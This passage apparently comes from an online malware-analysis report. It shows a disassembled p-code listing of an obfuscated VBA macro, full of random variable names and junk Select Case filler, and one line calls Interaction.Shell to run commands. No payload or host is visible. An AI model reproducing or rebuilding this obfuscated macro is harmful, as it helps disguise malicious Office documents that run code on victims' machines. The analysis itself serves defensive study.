' Ld LAPArGbcfPkPwGHaBT
' St LAPArGbcfPkPwGHaBT
' Line #159:
' LitDI4 0x7DE7 0x0DF9
' Case
' CaseDone
' Line #160:
' LitDI4 0xF869 0x0949
' St VjmiKUTuMUJTJXH
' Line #161:
' LitDI4 0xAEE9 0x031A
' St RfKhbUDaPGNPQLvUwjmYREj
' Line #162:
' EndSelect
' Line #163:
' SetStmt
' Ld NGfvJOwNrUKZNznWMMhioPY
' Set PIWwbrpXPIWIauMi
' Line #164:
' Ld VDizBdGwhnuHpmrFuU
' ArgsLd Hex 0x0001
' St ACZMVlaqKJSRjTwIzOAUMpv
' Line #165:
' Ld DhVqsOZjZPEjLHCqR
' SelectCase
' Line #166:
' LitDI4 0xDB6E 0x1213
' Case
' CaseDone
' Line #167:
' LitDI4 0x1D42 0x07A7
' LitDI4 0x43A2 0x1259
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St uZvDONZKwBLOrPoXTKWGHZ
' Line #168:
' Ld hfijscNvjRIjUfijYmIvF
' St WpaQPriiqlwFLZQR
' Line #169:
' LitDI4 0x3646 0x00CD
' Case
' CaseDone
' Line #170:
' LitDI4 0xCAD8 0x089D
' St hYGSiMutEnNoMhoIho
' Line #171:
' LitDI4 0xB252 0x0A09
' St BMhFcactrfKzjNwJaatABmN
' Line #172:
' EndSelect
' Line #173:
' SetStmt
' Ld NIwjfiHuBtPwLmwHbBba
' Set fSBrQFUtJRVrAqIjAC
' Line #174:
' Ld CWfNtAHzazmHlDGMJ
' ArgsLd Hex 0x0001
' St GWvcSZklRAkntFXUSMhzZr
' Line #175:
' Ld pjCTjtY
' Ld TKXuZsarp
' Ld NpkbzhjdH
' Ld TYhPwXvI
' Ld IBanSDFGTpJ
' Ld [AmvZCTij]
' ArgsMemLd Interaction 0x0002
' Ld Shell
' ArgsArray Array 0x0005
' St JksfLRhYnJoucPOGtG
' Line #176:
' Ld NmzTX
' SelectCase
' Line #177:
' LitDI4 0x42F9 0x129F
' Case
' CaseDone
' Line #178:
' LitDI4 0xADD5 0x0661
' LitDI4 0xF771 0x0EA9
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St TGmqTvSULcqtipcZ
' Line #179:
' Ld tAOUwMZlzNuTwF
' St wBMNGWnPJKsojofUopica
' Line #180:
' LitDI4 0x07AC 0x137B
' Case
' CaseDone
' Line #181:
' LitDI4 0x7E37 0x10A1
' St QCDlHbWsBOOAmvSGjQLUGHTR
' Line #182:
' LitDI4 0x0E3F 0x11B3
' St HoWuLVjqOZWidZXHNFkLn
' Line #183:
' EndSelect
' Line #184:
' SetStmt
' Ld BmlwwtNjmzQHQjIhzzGqk
' Set GNDnltIjmnWUhVGCsRvj
' Line #185:
' Ld FatKUwaCzKfjHMmLosG
' ArgsLd Hex 0x0001
' St GFpmHCstrJnWMQCouOVFBZD
' Line #186:
' Ld TtUsfICrUfphBPj
' SelectCase
' Line #187:
' LitDI4 0x4AE0 0x046A
' Case
' CaseDone
' Line #188:
' LitDI4 0x5D45 0x0573
' LitDI4 0xEEA5 0x1102
' ArgsLd ChrB 0x0001
' Div
' ArgsLd ChrB 0x0001
' St FqkjqWocALjqMHtsWd
' Line #189:
' Ld KVBtLHBKdHUYjOASQBqE
' St SnajslBuQHYIcLOzn
' Line #190:
' LitDI4 0xDA28 0x0EDC
' Case
' CaseDone
' Line #191:
' LitDI4 0x101E 0x072A
' St tMtmXOBsuEIlhGwmjY
' Line #192:
' LitDI4 0xE570 0x0750
' St qRImzZNKwjmXmIRJIGntA
' Line #193:
' EndSelect
' Line #194:
' SetStmt
' Ld zYpndaksjYiFaNXFGQAIS
' Set CMmBIEjjdEVicEGmwArvK
' Line #195:
' Ld sLmFtwfZaukfKJS
' ArgsLd Hex 0x0001
' St ipECTpsJWYkandTRC
' Line #196:
' Ld uAibHvAZCJUzZumpOrQHi
' SelectCase
' Line #197:
' LitDI4 0xA997 0x005C
' Case
' CaseDone
' Line #198:
' LitDI4 0xA448 0x0F16
' LitDI4 0x115A 0x11D1
' ArgsLd ChrB 0x0001
' Div
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.